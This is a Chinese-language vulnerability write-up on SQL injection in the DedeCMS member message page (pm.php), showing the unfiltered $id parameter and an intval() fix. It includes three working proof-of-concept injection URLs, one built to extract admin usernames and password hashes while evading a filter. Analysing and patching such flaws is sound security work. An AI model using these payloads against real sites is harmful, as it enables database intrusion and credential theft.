dedecms pm.php,dedecms /member/pm.php SQL Injection Vul
catalog
1. 漏洞描述2. 漏洞触发条件3. 漏洞影响范围4. 漏洞代码分析5. 防御方法6. 攻防思考
1. 漏洞描述
Dedecms会员中心注入漏洞
Relevant Link
http://www.05112.com/anquan/ldfb/sql/2014/0209/7723.html
2. 漏洞触发条件
0x1: POC1
http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1‘ and char(@`‘`) and 1=2+UniOn+SelEct 1,2,3,4,5,6,7,8,9,10,11,12%20%23
0x2: POC2
如果报错: Safe Alert: Request Error step 1 !
http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′and char(@`’`) and 1=2+/*!50000Union*/+/*!50000select*/+1,2,3,4,5,6,userid,8,9,10,11,pwd+from+`%23@__admin`%23
0x3: POC3
报错注入
http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′ and @‘ and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and ‘1‘=‘1
Relevant Link
http://www.myhack58.com/Article/html/3/62/2014/42255.htm
3. 漏洞影响范围
4. 漏洞代码分析
/member/pm.php
else if($dopost==‘read‘)
{
$sql= "SELECT * FROM `#@__member_friends` WHERE mid=‘{$cfg_ml->M_ID}‘ AND ftype!=‘-1‘ ORDER BY addtime DESC LIMIT 20";
$friends=array();
$dsql->SetQuery($sql);
$dsql->Execute();while ($row = $dsql->GetArray())
{
$friends[]=$row;
}//$id注入
$row = $dsql->GetOne("SELECT * FROM `#@__member_pms` WHERE id=‘$id‘ AND (fromid=‘{$cfg_ml->M_ID}‘ OR toid=‘{$cfg_ml->M_ID}‘)");//ID没过滤
if(!is_array($row))
{
ShowMsg(‘对不起,你指定的消息不存在或你没权限查看!‘,‘-1‘);
exit();
}//$id注入
$dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE id=‘$id‘ AND folder=‘inbox‘ AND toid=‘{$cfg_ml->M_ID}‘");
$dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE folder=‘outbox‘ AND toid=‘{$cfg_ml->M_ID}‘");
include_once(dirname(__FILE__).‘/templets/pm-read.htm‘);
exit();
}
Relevant Link
http://0day5.com/archives/1313
5. 防御方法
/member/pm.php
else if($dopost==‘read‘)
{
$sql= "Select * From `#@__member_friends` where mid=‘{$cfg_ml->M_ID}‘ And ftype!=‘-1‘ order by addtime desc limit 20";
$friends=array();
$dsql->SetQuery($sql);
$dsql->Execute();while ($row = $dsql->GetArray())
{
$friends[]=$row;
}/*$id过滤*/$id=intval($id);/* */$row= $dsql->GetOne("Select * From `#@__member_pms` where id=‘$id‘ And (fromid=‘{$cfg_ml->M_ID}‘ Or toid=‘{$cfg_ml->M_ID}‘)");if(!is_array($row))
{
ShowMsg(‘对不起,你指定的消息不存在或你没权限查看!‘,‘-1‘);
exit();
}
$dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where id=‘$id‘ And folder=‘inbox‘ And toid=‘{$cfg_ml->M_ID}‘");
$dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where folder=‘outbox‘ And toid=‘{$cfg_ml->M_ID}‘");
include_once(dirname(__FILE__).‘/templets/pm-read.htm‘);
exit();
}
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
原文:http://www.cnblogs.com/LittleHann/p/4519096.html
dedecms pm.php,dedecms /member/pm.php SQL Injection Vul相关推荐
- dedecms /member/reg_new.php SQL Injection Vul
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 Dedecms会员中心注入漏洞 2. 漏洞触发条件 http ...
- dedecms /plus/feedback.php SQL Injection Vul
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 1. Dedecms v5.7的plus\feedback. ...
- ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过 ...
- dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit.inc.php
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 注射漏洞成功需要条件如下 1. php magic_quot ...
- ecshop /api/client/api.php、/api/client/includes/lib_api.php SQL Injection Vul
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 ECShop存在一个盲注漏洞,问题存在于/api/clien ...
- phpcms /api/phpsso.php SQL Injection Vul
catalogue 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 Relevant Link: 2. 漏洞触发条件 3. ...
- member pm.php,Dedecms 会员中心注入漏洞5
漏洞作者: Matt [php]member/pm.php else if($dopost=='read') { $sql = "SELECT * FROM `#@__member_frie ...
- SAP PM 初级系列13 - PM Revision
SAP PM 初级系列13 - PM Revision SAP PM模块的Revision用于将维修通知或者维修工单分组,在维修的时候执行相关的工作. PM Revision一般在工厂shutdown ...
- SAP PM 初级系列8 - PM 组织架构
SAP PM 初级系列8 - PM 组织架构 1,SAP PM模块的典型组织架构如下示: 2,SAP PM organizational structure includes the followin ...
- SAP PM 入门系列14 – PM模块与其它模块的集成
SAP PM 入门系列14 – PM模块与其它模块的集成 SAP PM与其他模块(如物料管理,生产计划,人事管理以及销售和分销)都有高度紧密的集成.以下是使用Plant Maintenance进行集成 ...
最新文章
- Pandas把dataframe的索引、复合索引变换为数据列:包含单索引到单列(重命名)、复合索引到多数据列、复合索引的其中一个水平变换为数据列、
- Java 避免精度丢失之BigDecimal 运算
- 每天数十亿次请求的应用经验分享,值得参考!
- 记一次重构:Android实践从MVC架构到MVP架构
- php和apache配置 LoadModule php5_module D:/php/php5apache2.dll
- Python爬虫之起点中文网完本小说
- 淘宝618超级喵运会怎么玩 如何获取喵币?
- 使用JavaScript实现省市县三级联动
- matlab运行很多columns,columns函数的使用方法
- 服务器安装win7系统不停重启,win7系统下路由器总是每天都自动重启如何解决
- Java锁深入理解5——共享锁
- 职场中干好工作的18准则
- SVM算法(三层境界)
- 题库小程序盈利点分析
- 微软新专利暗示:多功能Surface Pen触控笔可能问世
- bash alias命令03
- 3GPP TS 23501-g51 中英文对照 | 5.2.2 Network selection
- vue给元素添加指令_Vue指令动态模糊元素
- 俏兔子大战傻贼鹰(刚开始接触是写的,一直在草稿箱)
- join()方法的作用
热门文章
- [项目管理-2]:软硬件项目管理 - 干系人管理、实践活动、常见工具
- Python excel数据处理之公式---openpyxl
- Kubernetes 学习总结(24)—— Kubernetes 滚动更新、蓝绿发布、金丝雀发布等发布策略详解
- 拉里 埃里森_拉里·沃尔(Larry Wall)的“程序员的三个美德”是胡说八道
- 作为一名优秀的程序员,如何选购适合自己的显示器
- itext生成pdf间距_[itext]Java生成PDF文件
- swift语言实战晋级-第9章 游戏实战-跑酷熊猫-9-10 移除平台与视差滚动
- 中序和后序构建二叉树
- 如何查看网站被搜索引擎收录的情况
- 【调剂】关于开通上海第二工业大学2022年硕士研究生招生预调剂系统的通知